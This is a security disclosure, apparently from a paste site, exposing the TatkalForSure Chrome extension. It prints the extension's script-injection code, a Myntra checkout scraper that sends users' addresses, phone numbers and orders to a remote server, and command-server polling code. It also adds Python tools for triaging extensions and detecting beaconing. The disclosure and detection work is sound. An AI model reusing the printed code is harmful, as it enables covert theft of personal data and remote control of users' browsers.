a guest
May 3rd, 2018
Chrome Web Store URL: https://chrome.google.com/webstore/detail/tatkal-for-sure-irctc-tat/mjibdhifibokijabebohlhfnmljbleff?utm_source=chrome-ntp-icon
Version: 1.0.131

The TatkalForSure extension from BuyHatke is advertised as an extension that helps users book tatkal train tickets, but it has been doing the following malicious activities:

1. Stealing the user's personal information (address, phone number, products bought in e-commerce stores) and sending it to BuyHatke servers.

2. Using the user's computer, without his/her knowledge, to visit URLs obtained from a command server. This can be used for hijacking affiliate marketing parameters of other sites, scraping websites, DDoS, etc.

The following sections explain how the extension carries out the above activities.
  13.  
1. Stealing the user's personal information:

ck.js, a content script file (the extension has permission to execute this file on all pages a user visits), checks the URL of the page the user visits for the following patterns:

"www.amazon.in/",
"myntra.com/checkout/confirm",
"myntra.com/checkout/paymen",
"jabong.com/checkout/success",
"ebay.in/OrderConfir",
"snapdeal.com/prepareThankYouPage",
"shopclues.com/atom/orderConfirmation",
"paytmall.com/shop/summary",
"www.flipkart.com/orderresponse",

and downloads a JavaScript file appropriate to the matching pattern and injects that JavaScript code into the DOM.

The injected JavaScript file reads the user's personal information, such as the products in their cart, address and mobile number, and sends it to BuyHatke servers.

For example, when a user visits myntra.com and orders a product, the user reaches the payment page of that site, whose URL matches the pattern "myntra.com/checkout/paymen", so ck.js downloads a JS file from "https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js" and injects the JavaScript code into the site's DOM. The injected code reads the user's address and phone number from the site's payment page and stores them in a cookie named "addressobject".

After payment, "myntra.com" takes the user to the order confirmation page, whose URL matches the pattern "myntra.com/checkout/confirm", so ck.js again injects the JavaScript code from "https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js" into the site's DOM. The injected code reads a JavaScript object on "myntra.com" which contains information about the product bought by the user, then reads the "addressobject" cookie (which the injected JS set on the payment page; it contains the user's address and phone number), and finally sends the stolen data (products purchased by the user, and the user's address and phone number) as a POST request to "https://tatkalforsure.com/checkoutjs/checkout.php".

The extension uses similar schemes and techniques on many sites, stealing personal information that is only available to the user after authentication. Following is a list of sites where the extension's malicious activity is known as of now, and the source URL of the code the extension injects on each:
  37.  
site: amazon.in,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/amazcook.js, https://buyhatke.com/checkxyz/checkoutjs/amazcheck.js

site: myntra.com,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js

site: jabong.com,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/jabongcheck.js

site: ebay.in,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/ebaycheck.js

site: snapdeal.com,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/snapcheck.js

site: shopclues.com,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/shopcheck.js

site: paytmmall.com,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/paytmcheck.js

site: flipkart.com,
injected script source: https://buyhatke.com/checkxyz/checkoutjs/flipcheck.js
  61.  
  62.  
The following code listing from the ck.js file in the extension downloads the JavaScript code and injects it into the page (the "here they check" comments are analysis annotations):
  64.  
  65.  
var s = document.createElement("script"),
    j = document.createElement("script"),
    t = document.createElement("script");
j.id = "bh-jquery", s.id = "bh-script", j.src = "https://code.jquery.com/jquery-3.2.1.min.js";
var url = window.location.href;
//here they check for flipkart.com and inject the js code relevant to flipkart.com
url.split("www.flipkart.com/orderresponse").length > 1 && (s.src = "https://buyhatke.com/checkxyz/checkoutjs/flipcheck.js",
    (document.head || document.documentElement).appendChild(j),
    (document.head || document.documentElement).appendChild(s)),
//here they check for amazon.in and inject the js code relevant to amazon.in
url.split("www.amazon.in/").length > 1 && (s.src = "https://buyhatke.com/checkxyz/checkoutjs/amazcook.js",
    (document.head || document.documentElement).appendChild(j),
    (document.head || document.documentElement).appendChild(s)),
url.split("www.amazon.in/").length > 1 && (t.src = "https://buyhatke.com/checkxyz/checkoutjs/amazcheck.js",
    (document.head || document.documentElement).appendChild(j),
    setTimeout(function() {
        (document.head || document.documentElement).appendChild(t)
    }, 400)),
//here they check for myntra.com and inject the js code relevant to myntra.com
(url.split("myntra.com/checkout/confirm").length > 1 || url.split("myntra.com/checkout/paymen").length > 1) && ((document.head || document.documentElement).appendChild(j),
    s.src = "https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js",
    setTimeout(function() {
        (document.head || document.documentElement).appendChild(s)
    }, 400)),
//here they check for jabong.com and inject the js code relevant to jabong.com
url.split("jabong.com/checkout/success").length > 1 &&
    ((document.head || document.documentElement).appendChild(j),
    s.src = "https://buyhatke.com/checkxyz/checkoutjs/jabongcheck.js",
    (document.head || document.documentElement).appendChild(s)),
//here they check for ebay.in and inject the js code relevant to ebay.in
url.split("ebay.in/OrderConfir").length > 1 &&
    ((document.head || document.documentElement).appendChild(j),
    s.src = "https://buyhatke.com/checkxyz/checkoutjs/ebaycheck.js",
    (document.head || document.documentElement).appendChild(s)),
//here they check for snapdeal.com and inject the js code relevant to snapdeal.com
url.split("snapdeal.com/prepareThankYouPage").length > 1 &&
    ((document.head || document.documentElement).appendChild(j),
    s.src = "https://buyhatke.com/checkxyz/checkoutjs/snapcheck.js",
    (document.head || document.documentElement).appendChild(s)),
//here they check for shopclues.com and inject the js code relevant to shopclues.com
url.split("shopclues.com/atom/orderConfirmation").length > 1 &&
    ((document.head || document.documentElement).appendChild(j),
    s.src = "https://buyhatke.com/checkxyz/checkoutjs/shopcheck.js",
    (document.head || document.documentElement).appendChild(s)),
//here they check for paytmall.com and inject the js code relevant to paytmall.com
url.split("paytmall.com/shop/summary").length > 1 &&
    ((document.head || document.documentElement).appendChild(j),
    s.src = "https://buyhatke.com/checkxyz/checkoutjs/paytmcheck.js",
    (document.head || document.documentElement).appendChild(s));
  110.  
  111.  
  112.  
Following is the code the extension injects on myntra.com:
  114.  
console.log("loaded");
var url = window.location.href;
var urlcheck = "myntra.com/checkout/confirm";
//this is where the code checks for the order confirmation page
if (url.split(urlcheck).length > 1) {
    //For more than one product
    //analyticsLayer is a javascript object on myntra.com; it contains information about the products in the cart
    var analyticsLayer = analyticsLayer;
    //read the products bought by the user
    var noofproducts = analyticsLayer.products.length;
    var products = [];
    var k = 0;
    for (var i = 0; i < noofproducts; i++) {
        var productname = analyticsLayer.products[i]["Style-Name"];
        var productcode = analyticsLayer.products[i].SKU;
        var productsize = analyticsLayer.products[i].Size;
        var deliverydate = '';
        var quantity = parseFloat(analyticsLayer.products[i].Quantity);
        var sellername = "none";
        var productprice = parseFloat(analyticsLayer.products[i].Price);
        //For more than one order id
        var orderid = analyticsLayer.id;
        var product = {
            "name": encodeURIComponent(productname),
            "pid": encodeURIComponent(productcode),
            "quantity": encodeURIComponent(quantity),
            "size": '',
            "price": encodeURIComponent(productprice),
            "sellername": encodeURIComponent(sellername),
            "deliverydate": encodeURIComponent(deliverydate),
            "orderid": encodeURIComponent(orderid)
        }
        products.push(product);
    }
    products = JSON.stringify(products);
    products = encodeURIComponent(products);
    //Total amount (More than one order)
    var amount = analyticsLayer.revenue;
    //General for all
    var username = $(".user-name").text();
    var mobile = '';
    //gets the address from the cookie set on the previous page
    var addressobject = getCookie("addressobject");
    //addressobject=JSON.stringify(addressobject);
    var clienttime = Date.now();
    var date = Date.now();
    var email = '';
    var bankname = "bhuwan";
    var modeofpayment = $(".pmode").text().split("Payment Mode")[1].trim().replace(/[^\x20-\x7E]/gmi, " ");
    var website = 111;
    var jsonArr = [{
        'modeofpayment': modeofpayment,
        'orderid': orderid,
        'bankname': bankname,
        'email': email,
        'date': date,
        'amount': amount,
        'username': username,
        'mobile': mobile,
        'address': addressobject,
        'products': products,
        'website': website,
        'aff': 'thirdparty',
        'param1': 'thirdparty',
        'param2': 'thirdparty'
    }];
    // jsonArr = JSON.stringify(jsonArr);
    //code is formatting the stolen data as POST parameters
    var jsonParData = jsonArr;
    var parameters = "ext_id=10000001&auth_val=10000001";
    var L = jsonParData.length;
    for (var i = 0; i < L; i++) {
        var obj = jsonParData[i];
        for (var j in obj) {
            var paramKey = (j);
            var paramVal = (jsonParData[i][j]);
            parameters += "&" + paramKey + "=" + paramVal;
        }
    }
    // console.log("parameters"+parameters);
    //stolen data is sent to the server
    //jsonArr = JSON.stringify(jsonArr);
    $.ajax({
        url: 'https://tatkalforsure.com/checkoutjs/checkout.php',
        type: 'post',
        dataType: 'json',
        success: function(data) {
            //$('#target').html(data.msg);
            console.log("done");
        },
        data: parameters
    });
    //console.log("type");
}
//this is where the code checks for the payment page on "myntra.com"
//the code reads the address and phone number of the user and sets it as a cookie
if (url.split("checkout/paymen").length > 1) {
    // alert("bhuwan");
    var fullname = $(".name").eq(0).text();
    var address1 = $("div.address").text();
    var address2 = $(".locality").text();
    var address = address1 + "," + address2;
    var landmark = "";
    var city = $(".city").text().split("-")[0].trim();
    var state = $(".state").text();
    var mobilenumber = $("div.mobile").text().split("Mobile:")[1].trim();
    var pincode = $(".city").text().split("-")[1].trim();
    var addressobject = {
        "type": '',
        "fullname": encodeURIComponent(fullname),
        "address1": encodeURIComponent(address1),
        "address2": encodeURIComponent(address2),
        "address": encodeURIComponent(address),
        "landmark": encodeURIComponent(landmark),
        "city": encodeURIComponent(city),
        "state": encodeURIComponent(state),
        "mobilenumber": encodeURIComponent(mobilenumber),
        "pincode": encodeURIComponent(pincode)
    }
    addressobject = JSON.stringify(addressobject);
    addressobject = encodeURIComponent(addressobject);
    setCookie1("addressobject", addressobject);
}
function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1);
        if (c.indexOf(name) != -1) return c.substring(name.length, c.length);
    }
    return "";
}
//note: the call above passes no exdays, so the expiry computed here is NaN and the cookie is scoped to the parent domain
function setCookie1(cname, cvalue, exdays) {
    var d = new Date();
    var dom = window
    d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
    var expires = "expires=" + d.toGMTString();
    document.cookie = cname + "=" + cvalue + "; " + expires + "; path=/;domain=" + "." + window.location.host.split(".")[1] + "." + window.location.host.split(".")[2];
}
  257.  
For the scripts injected on other sites, use the URLs given in the listing above.
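A defender triaging an extension like this one would want the manual check described above automated. The following Python is an added example written for this write-up, not code from the extension or from BuyHatke; it assumes a manifest.json that declares ck.js as a content script matching <all_urls> (the page does not reproduce the manifest) and builds a small constructed sample extension in a temp directory to run against.

```python
import json
import re
import tempfile
from pathlib import Path

# Triage helper written for this write-up; it is not code from the extension.
# It flags the traits described above in an unpacked extension directory:
# content scripts that run on every page, JS that assigns a remote URL to a
# script .src, the window.location substrings gating that injection, and
# jQuery posts to remote endpoints.
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
REMOTE_SRC = re.compile(r'\.src\s*=\s*"(https?://[^"]+)"')
URL_GATE = re.compile(r'url\.split\("([^"]+)"\)')
REMOTE_POST = re.compile(r'\$\.(?:post|ajax)\(\s*"(https?://[^"]+)"')

def triage_extension(ext_dir):
    """Return a dict of findings keyed by trait; each JS finding is (file, value)."""
    ext = Path(ext_dir)
    manifest = json.loads((ext / "manifest.json").read_text())
    findings = {"broad_content_scripts": [], "remote_script_src": [],
                "url_gates": [], "remote_posts": []}
    for cs in manifest.get("content_scripts", []):
        if BROAD_MATCHES & set(cs.get("matches", [])):
            findings["broad_content_scripts"] += cs.get("js", [])
    for js in sorted(ext.rglob("*.js")):
        text = js.read_text(errors="replace")
        findings["remote_script_src"] += [(js.name, u) for u in REMOTE_SRC.findall(text)]
        findings["url_gates"] += [(js.name, p) for p in URL_GATE.findall(text)]
        findings["remote_posts"] += [(js.name, u) for u in REMOTE_POST.findall(text)]
    return findings

# Constructed sample extension shaped like the ck.js/getpnr.js excerpts above.
# The manifest is assumed: the write-up does not reproduce it.
SAMPLE_MANIFEST = {"manifest_version": 2, "name": "sample", "version": "0.0.1",
                   "content_scripts": [{"matches": ["<all_urls>"], "js": ["ck.js"]}],
                   "background": {"scripts": ["getpnr.js"]}}
SAMPLE_CK_JS = ('var s = document.createElement("script"), url = window.location.href;\n'
                'url.split("myntra.com/checkout/paymen").length > 1 && (s.src = '
                '"https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js", document.head.appendChild(s));\n')
SAMPLE_BG_JS = '$.post("https://advcrawler.buyhatke.com/tatkalAPIs/submit.php", {"flag": 1});\n'

def build_sample_extension():
    """Write the constructed sample to a fresh temp dir and return its path."""
    d = Path(tempfile.mkdtemp())
    (d / "manifest.json").write_text(json.dumps(SAMPLE_MANIFEST))
    (d / "ck.js").write_text(SAMPLE_CK_JS)
    (d / "getpnr.js").write_text(SAMPLE_BG_JS)
    return str(d)
```

Run `triage_extension(build_sample_extension())` to see the four finding lists; pointing it at a real unpacked extension directory works the same way.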
  259.  
  260.  
2. Using the user's computer without their knowledge to visit unknown URLs

The extension's getpnr.js, which is listed as a background page script (the extension has permission to run this script whenever the user keeps their browser open), has code that communicates with a command server via HTTP requests: it hits the URL "https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=" every 10 minutes and, based on the response from the server, decides whether to visit a URL or not. The server decides what AJAX request the extension has to make, and after getting the data from that AJAX request the extension sends the data back to the server endpoint "https://advcrawler.buyhatke.com/tatkalAPIs/submit.php" in a POST HTTP request.

The following code from getpnr.js does the job of hitting the server every 10 minutes, getting data, making an AJAX request based on that data and sending the result of the AJAX request back to the server:
  266.  
  267.  
  268.  
function trainTwoFromAPI(settings, strMain, aparams) {
    //settings is a JSON-encoded jQuery ajax settings object supplied by the server
    var settings = JSON.parse(settings);
    //console.log(settings);
    //console.log("here532");
    $.ajax(settings).done(function(response) {
        //isJson is a helper not shown in this excerpt
        if (isJson(response) === true) {
            response = JSON.stringify(response);
        }
        $.post("https://advcrawler.buyhatke.com/tatkalAPIs/submit.php", {
            "id": strMain,
            "response": response,
            "flag": 1,
            "aparams": aparams
        }).then(function() {
            // console.log("Yay!");
        });
        // console.log(response);
    }).fail(function($xhr) {
        var dataResp = $xhr.responseText;
        $.post("https://advcrawler.buyhatke.com/tatkalAPIs/fail.php", {
            "response": $xhr.responseText,
            "id": strMain,
            "flag": 1,
            "aparams": aparams
        }).then(function() {});
    });
}

function tcs2() {
    $.ajax("https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=" + parseInt(20000000000 * Math.random()), {}).then(function(dataCrawl) {
        console.log(dataCrawl.status);
        if (dataCrawl.status) {
            urlCrawl = dataCrawl.data;
            trainTwoFromAPI(urlCrawl, dataCrawl.strMain, dataCrawl.aparams);
        }
    });
}
setInterval(function() {
    tcs2();
}, 10 * 60000);
tcs2();
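The 10-minute polling of getOtherAPI shown above is the kind of behaviour that stands out in proxy logs as periodic beaconing. The following Python is an added detection example written for this write-up, not code from the extension; the log lines and their format are constructed, and the random ?rand= cache-buster is stripped before grouping so the polls collapse onto one endpoint.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Detection example written for this write-up, not code from the extension.
# A background script polling a fixed endpoint every 10 minutes shows up in
# proxy logs as a near-constant inter-request interval to one host/path. The
# poll URL carries a random ?rand= cache-buster, so the query string must be
# dropped before grouping or every hit looks like a different URL.

# Constructed proxy log lines: "<ISO time> <client> <method> <url>".
SAMPLE_LOG = """\
2018-05-03T09:00:02 10.0.0.5 GET https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=4821133
2018-05-03T09:03:10 10.0.0.5 GET https://www.irctc.co.in/nget/train-search
2018-05-03T09:04:00 10.0.0.5 GET https://www.irctc.co.in/nget/train-search
2018-05-03T09:10:03 10.0.0.5 GET https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=99
2018-05-03T09:20:01 10.0.0.5 GET https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=1730022
2018-05-03T09:25:30 10.0.0.5 GET https://www.irctc.co.in/nget/train-search
2018-05-03T09:26:00 10.0.0.5 GET https://www.irctc.co.in/nget/train-search
2018-05-03T09:30:04 10.0.0.5 GET https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=56
2018-05-03T09:40:02 10.0.0.5 GET https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=8100
"""

def find_beacons(log_text, min_hits=4, max_jitter=0.05):
    """Return [(client, host, path, period_s)] for (client, host, path) groups
    whose inter-request intervals are nearly constant (pstdev/mean <= max_jitter)."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        ts, client, _method, url = line.split()
        parts = urlsplit(url)  # query string (the ?rand= cache-buster) is discarded on purpose
        times[(client, parts.netloc, parts.path)].append(datetime.fromisoformat(ts))
    beacons = []
    for key, stamps in times.items():
        if len(stamps) < min_hits:
            continue  # too few hits to judge periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            beacons.append((key[0], key[1], key[2], round(period)))
    return beacons
```

On the constructed sample only the advcrawler endpoint is reported (period 600 s); the irctc.co.in hits have the same count but irregular spacing and are left alone.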